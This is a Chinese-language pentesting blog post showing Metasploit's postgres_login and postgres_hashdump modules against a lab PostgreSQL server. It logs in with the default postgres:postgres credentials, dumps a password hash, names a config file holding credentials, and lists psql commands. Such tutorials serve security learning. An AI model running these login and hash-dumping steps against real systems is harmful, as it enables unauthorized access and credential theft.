Metasploit - postgres

最新推荐文章于 2024-01-25 14:47:28 发布

原创最新推荐文章于 2024-01-25 14:47:28 发布 · 1.2k 阅读

0 ·

CC 4.0 BY-SA版权

Pentesting 同时被 2 个专栏收录

160 篇文章

订阅专栏

Metasploit

65 篇文章

订阅专栏

本文详细介绍了如何使用Metasploit工具获取PostgreSQL数据库的登录权限，并展示了如何通过Metasploit进行数据库用户哈希获取、用户与账号信息的进一步探索。包括连接数据库、使用默认用户和数据库、执行SQL命令如查询数据库、表和结构信息，以及如何通过配置文件读取数据库用户密码。同时，文章提供了创建、删除数据库和表，以及重命名表的具体步骤。最后，通过示例展示了如何从数据库中导出哈希和利用这些哈希进行后续操作。

msf auxiliary(postgres_login) > set RHOSTS 192.168.1.107 
RHOSTS => 192.168.1.107
msf auxiliary(postgres_login) > set USERNAME postgres
USERNAME => postgres
msf auxiliary(postgres_login) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(postgres_login) > set DATABASE postgres
DATABASE => postgres
msf auxiliary(postgres_login) > run

[*] 192.168.1.107:5432 Postgres - [1/1] - Trying username:'postgres' with password:'postgres' on database 'postgres'
[+] 192.168.1.107:5432 Postgres - Logged in to 'postgres' with 'postgres':'postgres'
[+] 192.168.1.107:5432 Postgres - Success: postgres:postgres (Database 'postgres' succeeded.)
[*] 192.168.1.107:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

还可以获取postgres数据库用户hash.

msf auxiliary(postgres_hashdump) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(postgres_hashdump) > set RHOSTS 192.168.1.107
RHOSTS => 192.168.1.107
msf auxiliary(postgres_hashdump) > run

[*] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username  Hash
 --------  ----
 postgres  3175bce1d3201d16594cebf9d7eb3f9d

[*] Hash Table has been saved: /root/.msf4/loot/20140803222742_default_192.168.1.107_postgres.hashes_142455.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

获得用户，帐号，可以进一步获取更多信息.

连接数据库, 默认的用户和数据库是postgres  
psql -U user -d dbname  
      
切换数据库,相当于mysql的use dbname  
\c dbname  

列举数据库，相当于mysql的show databases  
\l  

列举表，相当于mysql的show tables  
\dt  

查看表结构，相当于desc tblname,show columns from tbname  
\d tblname  

查看索引
\di    
      
创建数据库：   
create database [数据库名];   

删除数据库：   
drop database [数据库名];    

重命名一个表：   
alter table [表名A] rename to [表名B];   

删除一个表：   
drop table [表名];

以metasploit数据为例，metasploit的用户密码保存在文件/opt/metasploit/apps/pro/ui/config/database.yml。

root@gnu:~# psql -h 192.168.1.107 -U postgres
Password for user postgres: 
psql (9.1.13, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
General
  \copyright             show PostgreSQL usage and distribution terms
  \g [FILE] or ;         execute query (and send results to file or |pipe)
  \h [NAME]              help on syntax of SQL commands, * for all commands
  \q                     quit psql

Query Buffer
  \e [FILE] [LINE]       edit the query buffer (or file) with external editor
  \ef [FUNCNAME [LINE]]  edit function definition with external editor
  \p                     show the contents of the query buffer
  \r                     reset (clear) the query buffer
  \s [FILE]              display history or save it to file
  \w FILE                write query buffer to file

Input/Output
  \copy ...              perform SQL COPY with data stream to the client host
  \echo [STRING]         write string to standard output
  \i FILE                execute commands from file
  \o [FILE]              send all query results to file or |pipe
  \qecho [STRING]        write string to query output stream (see \o)

Informational
  (options: S = show system objects, + = additional detail)
  \d[S+]                 list tables, views, and sequences
  \d[S+]  NAME           describe table, view, sequence, or index
  \da[S]  [PATTERN]      list aggregates
  \db[+]  [PATTERN]      list tablespaces
  \dc[S]  [PATTERN]      list conversions
  \dC     [PATTERN]      list casts
  \dd[S]  [PATTERN]      show comments on objects
  \ddp    [PATTERN]      list default privileges
  \dD[S]  [PATTERN]      list domains
  \det[+] [PATTERN]      list foreign tables
  \des[+] [PATTERN]      list foreign servers
  \deu[+] [PATTERN]      list user mappings
  \dew[+] [PATTERN]      list foreign-data wrappers
  \df[antw][S+] [PATRN]  list [only agg/normal/trigger/window] functions
  \dF[+]  [PATTERN]      list text search configurations
  \dFd[+] [PATTERN]      list text search dictionaries
  \dFp[+] [PATTERN]      list text search parsers
  \dFt[+] [PATTERN]      list text search templates
  \dg[+]  [PATTERN]      list roles
  \di[S+] [PATTERN]      list indexes
  \dl                    list large objects, same as \lo_list
  \dL[S+] [PATTERN]      list procedural languages
  \dn[S+] [PATTERN]      list schemas
  \do[S]  [PATTERN]      list operators
  \dO[S+] [PATTERN]      list collations
  \dp     [PATTERN]      list table, view, and sequence access privileges
  \drds [PATRN1 [PATRN2]] list per-database role settings
  \ds[S+] [PATTERN]      list sequences
  \dt[S+] [PATTERN]      list tables
  \dT[S+] [PATTERN]      list data types
  \du[+]  [PATTERN]      list roles
  \dv[S+] [PATTERN]      list views
  \dE[S+] [PATTERN]      list foreign tables
  \dx[+]  [PATTERN]      list extensions
  \l[+]                  list all databases
  \sf[+] FUNCNAME        show a function's definition
  \z      [PATTERN]      same as \dp

Formatting
  \a                     toggle between unaligned and aligned output mode
  \C [STRING]            set table title, or unset if none
  \f [STRING]            show or set field separator for unaligned query output
  \H                     toggle HTML output mode (currently off)
  \a                     toggle between unaligned and aligned output mode
  \C [STRING]            set table title, or unset if none
  \f [STRING]            show or set field separator for unaligned query output
  \H                     toggle HTML output mode (currently off)
  \pset NAME [VALUE]     set table output option
                         (NAME := {format|border|expanded|fieldsep|footer|null|
                         numericlocale|recordsep|tuples_only|title|tableattr|pager})
  \t [on|off]            show only rows (currently off)
  \T [STRING]            set HTML <table> tag attributes, or unset if none
  \x [on|off]            toggle expanded output (currently off)

Connection
  \c[onnect] [DBNAME|- USER|- HOST|- PORT|-]
                         connect to new database (currently "postgres")
  \encoding [ENCODING]   show or set client encoding
  \password [USERNAME]   securely change the password for a user
  \conninfo              display information about current connection

Operating System
  \cd [DIR]              change the current working directory
  \timing [on|off]       toggle timing of commands (currently off)
  \! [COMMAND]           execute command in shell or start interactive shell

Variables
  \prompt [TEXT] NAME    prompt user to set internal variable
  \set [NAME [VALUE]]    set internal variable, or list all if no parameters
  \unset NAME            unset (delete) internal variable

Large Objects
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID      large object operations